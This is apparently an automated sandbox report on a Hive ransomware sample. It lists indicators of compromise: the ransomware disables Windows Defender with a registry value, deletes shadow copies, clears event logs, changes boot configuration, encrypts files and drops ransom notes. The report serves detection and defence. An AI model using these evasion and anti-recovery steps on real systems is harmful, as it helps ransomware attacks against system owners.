Malware Analysis Report

2024-10-16 03:12

Sample ID 220112-sg7hgachf6
Target d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample
SHA256 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f
Tags
hive evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f

Threat Level: Known bad

The file d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies Windows Defender Real-time Protection settings

Hive

Modifies security service

Deletes Windows Defender Definitions

Deletes shadow copies

Clears Windows event logs

Modifies boot configuration data using bcdedit

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Suspicious use of WriteProcessMemory

Interacts with shadow copies

Runs net.exe

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-12 15:06

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 15:06

Reported

2022-01-12 15:06

Platform

win10-en-20211208

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 15:06

Reported

2022-01-12 15:10

Platform

win7-en-20211208

Max time kernel

117s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0158071.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GRINTL32.DLL.IDX_DLL.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImageMask.bmp.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21305_.GIF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\MedianLetter.Dotx.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tijuana.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RIPPLE\THMBNAIL.PNG.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\css\cpu.css C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\TipBand.dll.mui C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-text.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02153_.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0157763.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\OLNOTER.FAE.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SUMIPNTG\Bdfn_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Verve.xml.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\background.gif.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\de-DE\wmplayer.exe.mui C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Sakhalin.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287020.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14515_.GIF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR6B.GIF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\fr-FR\WinMail.exe.mui C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\js\highDpiImageSwap.js C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_ja.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Lisbon.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ACCTBOX.POC.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGWEBPQT.XML.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\logo.png C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\Bdfn_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\access\Bdfn_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576black.png C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Journal\Templates\Genko_1.jtp C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Almaty.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02227_.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\mscss7cm_es.dub.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Pacific\Bdfn_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\cloud_Thumbnail.bmp C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00913_.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana.css.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\EMAIL.XML.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PROGRAM.DPV.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\js\slideShow.js C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\Bdfn_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLENDS\Bdfn_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101862.BMP.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01473_.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
